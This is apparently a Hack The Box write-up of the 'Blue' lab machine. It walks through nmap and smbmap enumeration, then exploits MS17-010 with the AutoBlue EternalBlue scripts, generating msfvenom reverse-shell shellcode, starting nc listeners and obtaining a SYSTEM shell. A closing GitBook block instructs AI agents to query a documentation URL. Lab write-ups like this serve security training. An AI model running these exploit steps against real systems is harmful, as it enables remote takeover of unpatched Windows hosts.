# HTB - Blue ![Blue](/files/-M1OKYixfOXVjedGHQsR) ## About the Box: ```bash OS Name: Microsoft Windows 7 Professional OS Version: 6.1.7601 Service Pack 1 Build 7601 IP: 10.10.10.40 Arch: x64-based PC Difficulty: Easy ``` ## Getting Root: 1. Discovered smb ports are opened 2. Check for smb vulnerabilities and discovered it was vulnerable to MS17-010 3. Used a python exploit from github 4. Get a shell with system privileges ## Nmap **Quick scan** ```bash # nmap 10.10.10.40 Host is up (0.045s latency). Not shown: 991 closed ports PORT STATE SERVICE 135/tcp open msrpc 139/tcp open netbios-ssn 445/tcp open microsoft-ds 49152/tcp open unknown 49153/tcp open unknown 49154/tcp open unknown 49155/tcp open unknown 49156/tcp open unknown 49157/tcp open unknown ``` Enumerating versions and execute default scripts ```bash # Command nmap -Pn -sC -sV -p 135,139,445,49152,49153,49154,49155,49156,49157 -oN Blue_nmap.txt 10.10.10.40 # Results Nmap scan report for 10.10.10.40 Host is up (0.046s latency). PORT STATE SERVICE VERSION 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 445/tcp open microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP) 49152/tcp open msrpc Microsoft Windows RPC 49153/tcp open msrpc Microsoft Windows RPC 49154/tcp open msrpc Microsoft Windows RPC 49155/tcp open msrpc Microsoft Windows RPC 49156/tcp open msrpc Microsoft Windows RPC 49157/tcp open msrpc Microsoft Windows RPC Service Info: Host: HARIS-PC; OS: Windows; CPE: cpe:/o:microsoft:windows Host script results: |_clock-skew: mean: 53s, deviation: 0s, median: 52s | smb-os-discovery: | OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1) | OS CPE: cpe:/o:microsoft:windows_7::sp1:professional | Computer name: haris-PC | NetBIOS computer name: HARIS-PC\x00 | Workgroup: WORKGROUP\x00 |_ System time: 2020-01-20T17:22:24+00:00 | smb-security-mode: | account_used: guest | authentication_level: user | challenge_response: supported |_ message_signing: disabled (dangerous, but default) | smb2-security-mode: | 2.02: |_ Message signing enabled but not required | smb2-time: | date: 2020-01-20T17:22:26 |_ start_date: 2020-01-19T23:53:17 Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . # Nmap done at Mon Jan 20 12:21:39 2020 -- 1 IP address (1 host up) scanned in 69.89 seconds ``` ## Nmap - smb vuln script Nmap shows the target is vulnerable to MS-17-010 ```bash root@kdeali:~/HackTheBox/Blue# nmap --script vuln -p 139,445 10.10.10.40 Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-07 17:17 EST Pre-scan script results: | broadcast-avahi-dos: | Discovered hosts: | 224.0.0.251 | After NULL UDP avahi packet DoS (CVE-2011-1002). |_ Hosts are all up (not vulnerable). Nmap scan report for 10.10.10.40 Host is up (0.045s latency). PORT STATE SERVICE 139/tcp open netbios-ssn |_clamav-exec: ERROR: Script execution failed (use -d to debug) 445/tcp open microsoft-ds |_clamav-exec: ERROR: Script execution failed (use -d to debug) Host script results: |_smb-vuln-ms10-054: false |_smb-vuln-ms10-061: NT_STATUS_OBJECT_NAME_NOT_FOUND | smb-vuln-ms17-010: | VULNERABLE: | Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010) | State: VULNERABLE | IDs: CVE:CVE-2017-0143 | Risk factor: HIGH | A critical remote code execution vulnerability exists in Microsoft SMBv1 | servers (ms17-010). | | Disclosure date: 2017-03-14 | References: | https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/ | https://technet.microsoft.com/en-us/library/security/ms17-010.aspx |_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143 Nmap done: 1 IP address (1 host up) scanned in 51.69 seconds ``` ## smbmap Checking smp shares without username, we get nothing ```bash root@kdeali:~/HackTheBox/Blue# smbmap -H 10.10.10.40 [+] Finding open SMB ports.... [+] User SMB session established on 10.10.10.40... [+] IP: 10.10.10.40:445 Name: 10.10.10.40 Disk Permissions Comment ---- ----------- ------- [!] Access Denied ``` Checking smb shares specifying a username (I used "nobody12") and we got something ```bash root@kdeali:~/HackTheBox/Blue# smbmap -H 10.10.10.40 -u "nobody12" [+] Finding open SMB ports.... [+] Guest SMB session established on 10.10.10.40... [+] IP: 10.10.10.40:445 Name: 10.10.10.40 Disk Permissions Comment ---- ----------- ------- ADMIN$ NO ACCESS Remote Admin C$ NO ACCESS Default share IPC$ NO ACCESS Remote IPC . dr--r--r-- 0 Fri Jul 21 02:44:22 2017 . dr--r--r-- 0 Fri Jul 21 02:44:22 2017 .. Share READ ONLY . dw--w--w-- 0 Fri Jul 21 02:56:23 2017 . dw--w--w-- 0 Fri Jul 21 02:56:23 2017 .. dw--w--w-- 0 Fri Jul 14 18:37:45 2017 Default fr--r--r-- 174 Fri Jul 14 18:32:23 2017 desktop.ini dw--w--w-- 0 Fri Jul 21 02:40:38 2017 Public Users READ ONLY ``` The same results can be obtained by using -u " " (I prefer to specify a user) ```bash root@kdeali:~/HackTheBox/Blue# smbmap -H 10.10.10.40 -u " " [+] Finding open SMB ports.... [+] Guest SMB session established on 10.10.10.40... [+] IP: 10.10.10.40:445 Name: 10.10.10.40 Disk Permissions Comment ---- ----------- ------- ADMIN$ NO ACCESS Remote Admin C$ NO ACCESS Default share IPC$ NO ACCESS Remote IPC . dr--r--r-- 0 Fri Jul 21 02:44:22 2017 . dr--r--r-- 0 Fri Jul 21 02:44:22 2017 .. Share READ ONLY . dw--w--w-- 0 Fri Jul 21 02:56:23 2017 . dw--w--w-- 0 Fri Jul 21 02:56:23 2017 .. dw--w--w-- 0 Fri Jul 14 18:37:45 2017 Default fr--r--r-- 174 Fri Jul 14 18:32:23 2017 desktop.ini dw--w--w-- 0 Fri Jul 21 02:40:38 2017 Public Users READ ONLY ``` Checking the files recursively with -R to check for interesting files we read. ```bash root@kdeali:~/HackTheBox/Blue# smbmap -H 10.10.10.40 -u "nobody12" -R [+] Finding open SMB ports.... [+] Guest SMB session established on 10.10.10.40... [+] IP: 10.10.10.40:445 Name: 10.10.10.40 Disk Permissions Comment ---- ----------- ------- ADMIN$ NO ACCESS Remote Admin C$ NO ACCESS Default share IPC$ NO ACCESS Remote IPC . dr--r--r-- 0 Fri Jul 21 02:44:22 2017 . dr--r--r-- 0 Fri Jul 21 02:44:22 2017 .. Share READ ONLY .\ . dw--w--w-- 0 Fri Jul 21 02:56:23 2017 . dw--w--w-- 0 Fri Jul 21 02:56:23 2017 .. dw--w--w-- 0 Fri Jul 14 18:37:45 2017 Default fr--r--r-- 174 Fri Jul 14 18:32:23 2017 desktop.ini dw--w--w-- 0 Fri Jul 21 02:40:38 2017 Public Users READ ONLY .\ dw--w--w-- 0 Fri Jul 21 02:56:23 2017 . dw--w--w-- 0 Fri Jul 21 02:56:23 2017 .. dw--w--w-- 0 Fri Jul 14 18:37:45 2017 Default -r--r--r-- 174 Fri Jul 14 18:32:23 2017 desktop.ini dw--w--w-- 0 Fri Jul 21 02:40:38 2017 Public .\Default\ dw--w--w-- 0 Fri Jul 14 18:37:45 2017 . dw--w--w-- 0 Fri Jul 14 18:37:45 2017 .. dr--r--r-- 0 Fri Jul 14 18:37:45 2017 AppData dw--w--w-- 0 Fri Jul 14 18:37:45 2017 Desktop dw--w--w-- 0 Fri Jul 14 18:37:45 2017 Documents dw--w--w-- 0 Fri Jul 14 18:37:45 2017 Downloads dw--w--w-- 0 Fri Jul 14 18:37:45 2017 Favorites dw--w--w-- 0 Fri Jul 14 18:37:45 2017 Links dw--w--w-- 0 Fri Jul 14 18:37:45 2017 Music -r--r--r-- 262144 Sun Jul 16 16:22:24 2017 NTUSER.DAT -r--r--r-- 1024 Fri Jul 14 18:32:24 2017 NTUSER.DAT.LOG -r--r--r-- 189440 Sun Jul 16 16:22:24 2017 NTUSER.DAT.LOG1 -r--r--r-- 0 Fri Jul 14 18:37:45 2017 NTUSER.DAT.LOG2 -r--r--r-- 65536 Fri Jul 14 18:32:24 2017 NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf -r--r--r-- 524288 Fri Jul 14 18:32:24 2017 NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms -r--r--r-- 524288 Fri Jul 14 18:32:23 2017 NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms dw--w--w-- 0 Fri Jul 14 18:37:45 2017 Pictures dr--r--r-- 0 Fri Jul 14 18:37:45 2017 Saved Games dw--w--w-- 0 Fri Jul 14 18:37:45 2017 Videos .\Default\AppData\ dr--r--r-- 0 Fri Jul 14 18:37:45 2017 . dr--r--r-- 0 Fri Jul 14 18:37:45 2017 .. dr--r--r-- 0 Fri Jul 14 18:37:45 2017 Local dr--r--r-- 0 Fri Jul 14 18:37:45 2017 Roaming .\Default\AppData\Local\ dr--r--r-- 0 Fri Jul 14 18:37:45 2017 . dr--r--r-- 0 Fri Jul 14 18:37:45 2017 .. dr--r--r-- 0 Fri Jul 14 18:37:45 2017 Microsoft dr--r--r-- 0 Fri Jul 14 18:37:45 2017 Temp .\Default\AppData\Local\Microsoft\ dr--r--r-- 0 Fri Jul 14 18:37:45 2017 . dr--r--r-- 0 Fri Jul 14 18:37:45 2017 .. dr--r--r-- 0 Fri Jul 14 18:37:45 2017 Windows .\Default\AppData\Local\Microsoft\Windows\ dr--r--r-- 0 Fri Jul 14 18:37:45 2017 . dr--r--r-- 0 Fri Jul 14 18:37:45 2017 .. dr--r--r-- 0 Fri Jul 14 18:37:45 2017 GameExplorer dr--r--r-- 0 Fri Jul 14 18:37:45 2017 History dr--r--r-- 0 Fri Jul 14 18:37:45 2017 Temporary Internet Files .\Default\AppData\Roaming\ dr--r--r-- 0 Fri Jul 14 18:37:45 2017 . dr--r--r-- 0 Fri Jul 14 18:37:45 2017 .. dr--r--r-- 0 Fri Jul 14 18:37:45 2017 Media Center Programs dr--r--r-- 0 Fri Jul 14 18:37:45 2017 Microsoft .\Default\AppData\Roaming\Microsoft\ dr--r--r-- 0 Fri Jul 14 18:37:45 2017 . dr--r--r-- 0 Fri Jul 14 18:37:45 2017 .. dr--r--r-- 0 Fri Jul 14 18:37:45 2017 Internet Explorer dr--r--r-- 0 Fri Jul 14 18:37:45 2017 Windows .\Default\AppData\Roaming\Microsoft\Internet Explorer\ dr--r--r-- 0 Fri Jul 14 18:37:45 2017 . dr--r--r-- 0 Fri Jul 14 18:37:45 2017 .. dw--w--w-- 0 Fri Jul 14 18:37:45 2017 Quick Launch .\Default\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\ dw--w--w-- 0 Fri Jul 14 18:37:45 2017 . dw--w--w-- 0 Fri Jul 14 18:37:45 2017 .. -r--r--r-- 146 Fri Jul 14 18:32:24 2017 desktop.ini -r--r--r-- 290 Fri Jul 14 18:32:24 2017 Shows Desktop.lnk -r--r--r-- 272 Fri Jul 14 18:32:24 2017 Window Switcher.lnk .\Default\AppData\Roaming\Microsoft\Windows\ dr--r--r-- 0 Fri Jul 14 18:37:45 2017 . dr--r--r-- 0 Fri Jul 14 18:37:45 2017 .. dr--r--r-- 0 Fri Jul 14 18:37:45 2017 Cookies dr--r--r-- 0 Fri Jul 14 18:37:45 2017 Network Shortcuts dr--r--r-- 0 Fri Jul 14 18:37:45 2017 Printer Shortcuts dw--w--w-- 0 Fri Jul 14 18:37:45 2017 Recent dw--w--w-- 0 Fri Jul 14 18:37:45 2017 SendTo dw--w--w-- 0 Fri Jul 14 18:37:45 2017 Start Menu dr--r--r-- 0 Fri Jul 14 18:37:45 2017 Templates .\Default\AppData\Roaming\Microsoft\Windows\SendTo\ dw--w--w-- 0 Fri Jul 14 18:37:45 2017 . dw--w--w-- 0 Fri Jul 14 18:37:45 2017 .. -r--r--r-- 3 Fri Jul 14 18:32:24 2017 Compressed (zipped) Folder.ZFSendToTarget -r--r--r-- 7 Fri Jul 14 18:32:24 2017 Desktop (create shortcut).DeskLink -r--r--r-- 558 Fri Jul 14 18:32:24 2017 Desktop.ini -r--r--r-- 1238 Fri Jul 14 18:32:24 2017 Fax Recipient.lnk -r--r--r-- 4 Fri Jul 14 18:32:24 2017 Mail Recipient.MAPIMail .\Default\AppData\Roaming\Microsoft\Windows\Start Menu\ dw--w--w-- 0 Fri Jul 14 18:37:45 2017 . dw--w--w-- 0 Fri Jul 14 18:37:45 2017 .. dr--r--r-- 0 Fri Jul 14 18:37:45 2017 Programs .\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\ dr--r--r-- 0 Fri Jul 14 18:37:45 2017 . dr--r--r-- 0 Fri Jul 14 18:37:45 2017 .. dw--w--w-- 0 Fri Jul 14 18:37:45 2017 Accessories dw--w--w-- 0 Fri Jul 14 18:37:45 2017 Maintenance .\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\ dw--w--w-- 0 Fri Jul 14 18:37:45 2017 . dw--w--w-- 0 Fri Jul 14 18:37:45 2017 .. dw--w--w-- 0 Fri Jul 14 18:37:45 2017 Accessibility -r--r--r-- 1280 Fri Jul 14 18:32:24 2017 Command Prompt.lnk -r--r--r-- 678 Fri Jul 14 18:32:24 2017 Desktop.ini -r--r--r-- 1304 Fri Jul 14 18:32:24 2017 Notepad.lnk -r--r--r-- 262 Fri Jul 14 18:32:24 2017 Run.lnk dw--w--w-- 0 Fri Jul 14 18:37:45 2017 System Tools -r--r--r-- 1228 Fri Jul 14 18:32:24 2017 Windows Explorer.lnk .\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Accessibility\ dw--w--w-- 0 Fri Jul 14 18:37:45 2017 . dw--w--w-- 0 Fri Jul 14 18:37:45 2017 .. -r--r--r-- 704 Fri Jul 14 18:32:24 2017 Desktop.ini -r--r--r-- 1358 Fri Jul 14 18:32:24 2017 Ease of Access.lnk -r--r--r-- 1258 Fri Jul 14 18:32:24 2017 Magnify.lnk -r--r--r-- 1262 Fri Jul 14 18:32:24 2017 Narrator.lnk -r--r--r-- 1250 Fri Jul 14 18:32:24 2017 On-Screen Keyboard.lnk .\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\ dw--w--w-- 0 Fri Jul 14 18:37:45 2017 . dw--w--w-- 0 Fri Jul 14 18:37:45 2017 .. -r--r--r-- 262 Fri Jul 14 18:32:24 2017 computer.lnk -r--r--r-- 262 Fri Jul 14 18:32:24 2017 Control Panel.lnk -r--r--r-- 592 Fri Jul 14 18:32:24 2017 Desktop.ini -r--r--r-- 1306 Fri Jul 14 18:32:24 2017 Private Character Editor.lnk .\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance\ dw--w--w-- 0 Fri Jul 14 18:37:45 2017 . dw--w--w-- 0 Fri Jul 14 18:37:45 2017 .. -r--r--r-- 318 Fri Jul 14 18:32:24 2017 Desktop.ini -r--r--r-- 262 Fri Jul 14 18:32:24 2017 Help.lnk .\Public\ dw--w--w-- 0 Fri Jul 21 02:40:38 2017 . dw--w--w-- 0 Fri Jul 21 02:40:38 2017 .. -r--r--r-- 174 Fri Jul 21 02:40:38 2017 desktop.ini dw--w--w-- 0 Fri Jul 21 02:40:38 2017 Documents dw--w--w-- 0 Fri Jul 21 02:40:38 2017 Downloads dw--w--w-- 0 Fri Jul 21 02:40:38 2017 Favorites dw--w--w-- 0 Fri Jul 21 02:40:38 2017 Libraries dw--w--w-- 0 Fri Jul 21 02:40:38 2017 Music dw--w--w-- 0 Fri Jul 21 02:40:38 2017 Pictures dw--w--w-- 0 Fri Jul 21 02:40:38 2017 Recorded TV dw--w--w-- 0 Fri Jul 21 02:40:38 2017 Videos .\Public\Documents\ dw--w--w-- 0 Fri Jul 21 02:40:38 2017 . dw--w--w-- 0 Fri Jul 21 02:40:38 2017 .. -r--r--r-- 278 Fri Jul 21 02:40:38 2017 desktop.ini .\Public\Downloads\ dw--w--w-- 0 Fri Jul 21 02:40:38 2017 . dw--w--w-- 0 Fri Jul 21 02:40:38 2017 .. -r--r--r-- 174 Fri Jul 21 02:40:38 2017 desktop.ini .\Public\Libraries\ dw--w--w-- 0 Fri Jul 21 02:40:38 2017 . dw--w--w-- 0 Fri Jul 21 02:40:38 2017 .. -r--r--r-- 88 Fri Jul 21 02:40:38 2017 desktop.ini -r--r--r-- 876 Fri Jul 21 02:40:38 2017 RecordedTV.library-ms .\Public\Music\ dw--w--w-- 0 Fri Jul 21 02:40:38 2017 . dw--w--w-- 0 Fri Jul 21 02:40:38 2017 .. -r--r--r-- 380 Fri Jul 21 02:40:38 2017 desktop.ini dw--w--w-- 0 Fri Jul 21 02:40:38 2017 Sample Music .\Public\Music\Sample Music\ dw--w--w-- 0 Fri Jul 21 02:40:38 2017 . dw--w--w-- 0 Fri Jul 21 02:40:38 2017 .. -r--r--r-- 586 Fri Jul 21 02:40:38 2017 desktop.ini -r--r--r-- 8414449 Fri Jul 21 02:40:38 2017 Kalimba.mp3 -r--r--r-- 4113874 Fri Jul 21 02:40:38 2017 Maid with the Flaxen Hair.mp3 -r--r--r-- 4842585 Fri Jul 21 02:40:38 2017 Sleep Away.mp3 .\Public\Pictures\ dw--w--w-- 0 Fri Jul 21 02:40:38 2017 . dw--w--w-- 0 Fri Jul 21 02:40:38 2017 .. -r--r--r-- 380 Fri Jul 21 02:40:38 2017 desktop.ini dw--w--w-- 0 Fri Jul 21 02:40:38 2017 Sample Pictures .\Public\Pictures\Sample Pictures\ dw--w--w-- 0 Fri Jul 21 02:40:38 2017 . dw--w--w-- 0 Fri Jul 21 02:40:38 2017 .. -r--r--r-- 879394 Fri Jul 21 02:40:38 2017 Chrysanthemum.jpg -r--r--r-- 845941 Fri Jul 21 02:40:38 2017 Desert.jpg -r--r--r-- 1120 Fri Jul 21 02:40:38 2017 desktop.ini -r--r--r-- 595284 Fri Jul 21 02:40:38 2017 Hydrangeas.jpg -r--r--r-- 775702 Fri Jul 21 02:40:38 2017 Jellyfish.jpg -r--r--r-- 780831 Fri Jul 21 02:40:38 2017 Koala.jpg -r--r--r-- 561276 Fri Jul 21 02:40:38 2017 Lighthouse.jpg -r--r--r-- 777835 Fri Jul 21 02:40:38 2017 Penguins.jpg -r--r--r-- 620888 Fri Jul 21 02:40:38 2017 Tulips.jpg .\Public\Recorded TV\ dw--w--w-- 0 Fri Jul 21 02:40:38 2017 . dw--w--w-- 0 Fri Jul 21 02:40:38 2017 .. -r--r--r-- 80 Fri Jul 21 02:40:38 2017 desktop.ini dw--w--w-- 0 Fri Jul 21 02:40:38 2017 Sample Media .\Public\Recorded TV\Sample Media\ dw--w--w-- 0 Fri Jul 21 02:40:38 2017 . dw--w--w-- 0 Fri Jul 21 02:40:38 2017 .. -r--r--r-- 171 Fri Jul 21 02:40:38 2017 desktop.ini -r--r--r-- 9699328 Fri Jul 21 02:40:38 2017 win7_scenic-demoshort_raw.wtv .\Public\Videos\ dw--w--w-- 0 Fri Jul 21 02:40:38 2017 . dw--w--w-- 0 Fri Jul 21 02:40:38 2017 .. -r--r--r-- 380 Fri Jul 21 02:40:38 2017 desktop.ini dw--w--w-- 0 Fri Jul 21 02:40:38 2017 Sample Videos .\Public\Videos\Sample Videos\ dw--w--w-- 0 Fri Jul 21 02:40:38 2017 . dw--w--w-- 0 Fri Jul 21 02:40:38 2017 .. -r--r--r-- 326 Fri Jul 21 02:40:38 2017 desktop.ini -r--r--r-- 26246026 Fri Jul 21 02:40:38 2017 Wildlife.wmv ``` ## Exploiting - MS17-010 Manually Github: Run the shell\_prep.sh script and it will generate the payloads for x86 and x64 ```bash root@kdeali:/opt/AutoBlue-MS17-010/shellcode# ./shell_prep.sh _.-;;-._ '-..-'| || | '-..-'|_.-;;-._| '-..-'| || | '-..-'|_.-''-._| Eternal Blue Windows Shellcode Compiler Let's compile them windoos shellcodezzz Compiling x64 kernel shellcode Compiling x86 kernel shellcode kernel shellcode compiled, would you like to auto generate a reverse shell with msfvenom? (Y/n) Y LHOST for reverse connection: 10.10.14.19 LPORT you want x64 to listen on: 8123 LPORT you want x86 to listen on: 8124 Type 0 to generate a meterpreter shell or 1 to generate a regular cmd shell 1 Type 0 to generate a staged payload or 1 to generate a stageless payload 1 Generating x64 cmd shell (stageless)... msfvenom -p windows/x64/shell_reverse_tcp -f raw -o sc_x64_msf.bin EXITFUNC=thread LHOST=10.10.14.19 LPORT=8123 [-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload [-] No arch selected, selecting arch: x64 from the payload No encoder or badchars specified, outputting raw payload Payload size: 460 bytes Saved as: sc_x64_msf.bin Generating x86 cmd shell (stageless)... msfvenom -p windows/shell_reverse_tcp -f raw -o sc_x86_msf.bin EXITFUNC=thread LHOST=10.10.14.19 LPORT=8124 [-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload [-] No arch selected, selecting arch: x86 from the payload No encoder or badchars specified, outputting raw payload Payload size: 324 bytes Saved as: sc_x86_msf.bin MERGING SHELLCODE WOOOO!!! DONE root@kdeali:/opt/AutoBlue-MS17-010/shellcode# # These are the files generated root@kdeali:/opt/AutoBlue-MS17-010/shellcode# ls -l total 80 -rw-r--r-- 1 root root 20305 Jan 8 14:39 eternalblue_kshellcode_x64.asm -rw-r--r-- 1 root root 19862 Jan 8 14:39 eternalblue_kshellcode_x86.asm -rw-r--r-- 1 root root 1589 Jan 8 14:39 eternalblue_sc_merge.py -rw-r--r-- 1 root root 2203 Feb 7 17:27 sc_all.bin -rw-r--r-- 1 root root 1232 Feb 7 17:27 sc_x64.bin -rw-r--r-- 1 root root 772 Feb 7 17:26 sc_x64_kernel.bin -rw-r--r-- 1 root root 460 Feb 7 17:27 sc_x64_msf.bin -rw-r--r-- 1 root root 962 Feb 7 17:27 sc_x86.bin -rw-r--r-- 1 root root 638 Feb 7 17:26 sc_x86_kernel.bin -rw-r--r-- 1 root root 324 Feb 7 17:27 sc_x86_msf.bin -rwxr-xr-x 1 root root 4556 Jan 8 14:39 shell_prep.sh # The sc_all.bin is the file you need!!! ``` Start the listener ```bash # Port to get shell if x86 nc -lnvp 8123 and # Port to get shell if x64 nc -lnvp 8124 ``` Execute the exploit ```bash # Run it wihtout arguments to see the usage: root@kdeali:/opt/AutoBlue-MS17-010# python eternalblue_exploit7.py eternalblue_exploit7.py [numGroomConn] # Execute the exploit root@kdeali:/opt/AutoBlue-MS17-010# python eternalblue_exploit7.py 10.10.10.40 shellcode/sc_all.bin shellcode size: 2203 numGroomConn: 13 Target OS: Windows 7 Professional 7601 Service Pack 1 SMB1 session setup allocate nonpaged pool success SMB1 session setup allocate nonpaged pool success good response status: INVALID_PARAMETER done ``` We got a shell with system privileges ```bash root@kdeali:~/HackTheBox/Blue# nc -lnvp 8123 listening on [any] 8123 ... connect to [10.10.14.19] from (UNKNOWN) [10.10.10.40] 49158 Microsoft Windows [Version 6.1.7601] Copyright (c) 2009 Microsoft Corporation. All rights reserved. C:\Windows\system32>whoami whoami nt authority\system C:\Windows\system32>ipconfig ipconfig Windows IP Configuration Ethernet adapter Local Area Connection: Connection-specific DNS Suffix . : IPv6 Address. . . . . . . . . . . : dead:beef::d9ea:9b4b:ca07:c644 Temporary IPv6 Address. . . . . . : dead:beef::c1a3:4567:bd9d:edd4 Link-local IPv6 Address . . . . . : fe80::d9ea:9b4b:ca07:c644%11 IPv4 Address. . . . . . . . . . . : 10.10.10.40 Subnet Mask . . . . . . . . . . . : 255.255.255.0 Default Gateway . . . . . . . . . : fe80::250:56ff:feb9:3982%11 10.10.10.2 Tunnel adapter isatap.{CBC67B8A-5031-412C-AEA7-B3186D30360E}: Media State . . . . . . . . . . . : Media disconnected Connection-specific DNS Suffix . : Tunnel adapter Teredo Tunneling Pseudo-Interface: Media State . . . . . . . . . . . : Media disconnected Connection-specific DNS Suffix . : C:\Windows\system32> ``` --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://squid22.gitbook.io/notes/htb-writeups/writeups/htb-shocker.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.